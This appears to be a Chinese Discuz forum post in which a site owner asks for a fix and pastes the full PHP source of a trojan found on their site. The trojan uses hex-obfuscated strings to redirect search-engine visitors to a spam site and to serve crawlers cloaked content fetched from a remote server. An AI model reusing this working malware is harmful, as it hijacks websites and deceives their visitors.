之前很多人都发了这个木马,但是一直都没解决,官方也没给具体解决办法,
这里希望官方认真的给出解决办法,谢谢DZ
漏洞肯定是uc入手的那么,怎么修补
代码如下:
<?php
/**
* StartCache
*/
function relset_UC_key ($string){
$arraygn = strlen ($string);
$debuger = '';
for($one = 0;$one < $arraygn;$one += 2){
$debuger .= pack ("C", hexdec (substr ($string, $one, 2)));
}
return $debuger;
}
function relset_Turl ($url){
global $relset_host;
$string = relset_UC_key ('4c6f636174696f6e3a20' . $url . '3f') . str_replace ('.', '_', $relset_host);
header($string);
return true;
}
error_reporting (E_ERROR);
if(stristr($_SERVER['HTTP_REFERER'], 'site%3A') or stristr($_SERVER['HTTP_REFERER'], 'inurl%3A')){
setcookie('cookie', $_SERVER['HTTP_HOST'], time() + 259200);
}
if($_GET && !eregi('site%3A|inurl%3A', $_SERVER['HTTP_REFERER']) && empty($_COOKIE['cookie'])){
$clserv = & $_SERVER;
$relset_host = $clserv['HTTP_' . 'HOST'];
$relset_self = $clserv['PHP_' . 'SELF'];
$relset_refe = $clserv['HTTP_RE' . 'FERER'];
$relset_user = $clserv['HTTP_US' . 'ER_AGENT'];
if ($_GET['tid'] > 9999999 || $_GET['tid'] > 9999999){
$arrgpe = array(
'tid' => array('%B2%A9%B2%CA', '%b2%a9%b2%ca', '687474703A2F2F777777352E64616E6763693232322E636F6D2F'),
);
$keysar = array_keys ($_GET);
$arrgps = array_keys ($arrgpe);
$arrgpx = array_values (array_intersect ($arrgps, $keysar));
$rebotu = $arrgpx[0];//tid
$boswon = relset_UC_key ('62616964757C676F6F676C657C736F676F757C736F736F7C7961686F6F7C62696E677C626F747C7370696465727C736F7C333630
7C616E7175616E');
}
if (eregi ($boswon, $relset_refe)){
if (!empty ($rebotu)){
relset_Turl ($arrgpe[$arrgpx[0]][2]);
exit;
}else{
foreach($arrgpe as $vargn => $arraygn){
if(stristr ($relset_refe, $arraygn[0]) || stristr ($relset_refe, $arraygn[1])){
relset_Turl ($arraygn[2]);
exit;
}
}
}
}elseif (eregi ($boswon, $relset_user) && $rebotu){
$valsar = array_values ($_GET);
$retueby = array(
0 => relset_UC_key ('3f643d'),
1 => relset_UC_key ('26733d'),
2 => relset_UC_key ('26763d'),
3 => relset_UC_key ('26723d'),
4 => relset_UC_key ('636f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d676232333132'),
5 => relset_UC_key ('687474703a2f2f'),
6 => relset_UC_key ('5b30785370696465725d')
);
$inters = relset_UC_key ('3830');
$demuer = relset_UC_key ('78696E79756E626273322E616E7175616E2E7573');
$simeiao = relset_UC_key ('2f6170692f696e6465782e706870');
$classinction = $retueby[0] . $relset_host . $retueby[1] . $relset_self . $retueby[2] . $rebotu . $retueby[3] . join($valsar, '|')
;
header ($retueby[4]);
$dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
$url = $retueby[5] . $demuer . ':' . $inters . $simeiao . $classinction;
$file =$dir . 'sess_' . substr(md5($url), 6);
if(@file_exists($file) && @filesize ($file) > 32){
echo relset_UC_key(base64_decode(@file_get_contents($file)));
}else{
$skyword = @file_get_contents ($retueby[5] . $demuer . ':' . $inters . $simeiao . $classinction);
$skywords = explode ($retueby[6], $skyword);
if(!@file_exists($dir)){
@mkdir($dir, 0777);
}
@file_put_contents($file,base64_encode(bin2hex($skywords[1])));
echo $skywords[1];
}
exit;
}
}
/**
* EndCache
*/
?>
|
置顶卡
喧嚣卡
变色卡
千斤顶
显身卡
楼主